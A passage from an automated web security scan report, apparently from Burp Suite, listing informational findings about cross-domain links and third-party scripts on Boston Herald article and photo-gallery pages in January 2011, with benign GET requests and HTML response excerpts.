<a href="/entertainment/fashion/view/20110127ready_aim_zap_at-home_laser_offers_new_wrinkle_in_the_fight_vs_crows_feet/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/4149d9_eyes_01272011.jpg" alt="" /></a>
...[SNIP]...
<a href="/entertainment/travel/view/20110127disney_gone_wild_animal_kingdoms_new_tour_offers_an_african_safari_of_a_lifetime/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/964bf5_rope_01272011.jpg" alt="ROPE SWING: Adventure comes alive at Disney&#x2019;s Animal Kingdom as intrepid explorers get up close and personal with park wildlife including hippos and crocodiles lurking over the edge of a cliff." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/travel/view/20110127disney_gone_wild_animal_kingdoms_new_tour_offers_an_african_safari_of_a_lifetime/format=comments&srvc=edge&position=also">
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment" target="_new">All Entertainment</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/" target="_new">Arts & Culture</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" target="_new">Movie Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/" target="_new">Movie News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/" target="_new">Music News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/reviews/" target="_new">Disc Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/food_dining/" target="_new">Dining News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/health/" target="_new">Health & Fitness</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/travel/" target="_new">Travel</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/lifestyle/" target="_new">Lifestyle</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/fashion/" target="_new">Fashion</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/television/" target="_new">Television News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/books/" target="_new">Books</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_300x100.jpg" style="border: 1px #333 solid;" /></a>
...[SNIP]...
<a class="LinksRed2None" href="/blogs/entertainment/the_assistant/?srvc=edge&position=recent">
<img style="float:left; border:0;margin:0px 3px 0 0;padding:0;width:155px;height:50px;" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" border=0 />
</a>
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" alt="Age Gap of the Week: Lydia Hearst, 26, and Jeff Goldblum, 58" />
           Age Gap of the Week: Lydia Hearst, 26, and Jeff Goldblum, 58
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/guestlisted.jpg" alt="Exclusive video: Banditas strike!" />
           Exclusive video: Banditas strike!
           </a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/c1e423_ltpSteam012811.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.269. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the fragments that carry them are shown in the response excerpt below.

Request

GET /entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Movie Reviews - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Fmovies%2Freviews%2Fview%2F20110128killermoves_statham_fine-tunes_mechanic_mayhem%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/james_verniere.gif?1=1" alt="James Verniere" />
                                       <span class="bold">
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(2) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Jason Statham fine-tunes &lsquo;Mechanic&rsquo; mayhem');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(2) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/entertainment/movies/general/view/20110125action_star_statham_gets_his_fix_in_mechanic_remake/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/147abf_stath_01252011.jpg" alt="Action star Jason Statham gets his fix in &lsquo;Mechanic&rsquo; remake" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.270. http://www.bostonherald.com/galleries/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /galleries/index.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the fragments that carry them are shown in the response excerpt below.

Request

GET /galleries/index.php?gallery_id=10 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Boston Herald Sports Cov
...[SNIP]...
<meta name="SUBSECTION" content="Multimedia Center" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234" media="all" />


<style type="text/css">
...[SNIP]...
<a id="galleryHeaderLink" href="#"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a href="?gallery_id=10&p=0" ><img class="galleryThumb galleryThumbSelected" src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01282011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=1" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01272011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=2" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01262011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=3" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01252011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=4" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01242011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=5" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01232011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=6" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01202011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=7" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01212011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=8" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01192011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=9" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan182011_A064.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=10" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01172011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=11" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20110116.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=12" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01152011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=13" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan142011_A076.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=14" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01132011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=15" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01122011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=16" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01112011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=17" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01102011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=18" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01092011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=19" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=20" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01072011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=21" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01062011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=22" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01052011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=23" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01042011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=24" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_02032011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=25" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01022011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=26" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01012011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=27" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12312010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=28" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=29" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=30" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=31" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=32" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=33" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12252010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=34" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=35" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=36" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=37" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=38" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=39" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=40" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20101218.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=41" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=42" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=43" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12152010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=44" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec142010_A060.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=45" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/swports12132010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=46" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12092010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=47" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12122010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=48" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12112010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=49" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12102010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=50" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=51" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec072010_A068.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=52" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=53" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12052010.jpg" alt="Photo" /></a>
...[SNIP]...
<div id="galleryLeftPhotoLeft">
<img id="galleryImage" style="border:solid 1px #000" src="http://multimedia.heraldinteractive.com/images/galleries/Sports_01282011.jpg">

<br />
...[SNIP]...

17.271. http://www.bostonherald.com/homepage.bg
